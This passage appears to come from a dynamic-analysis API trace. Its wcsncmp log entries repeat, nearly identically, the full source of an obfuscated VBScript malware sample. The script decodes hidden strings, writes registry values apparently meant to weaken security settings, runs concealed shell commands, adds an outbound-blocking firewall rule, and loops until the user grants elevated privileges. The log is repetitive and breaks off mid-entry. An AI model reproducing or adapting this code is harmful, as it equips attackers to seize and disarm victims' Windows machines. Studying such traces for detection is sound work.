_MaxCount=0x21) returned 53 [0223.025] wcsncmp (_String1="SCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0223.025] wcsncmp (_String1="CV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0223.025] wcsncmp (_String1="V\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0223.025] wcsncmp (_String1="\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0223.025] wcsncmp (_String1=") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0223.025] wcsncmp (_String1=" & str1 & 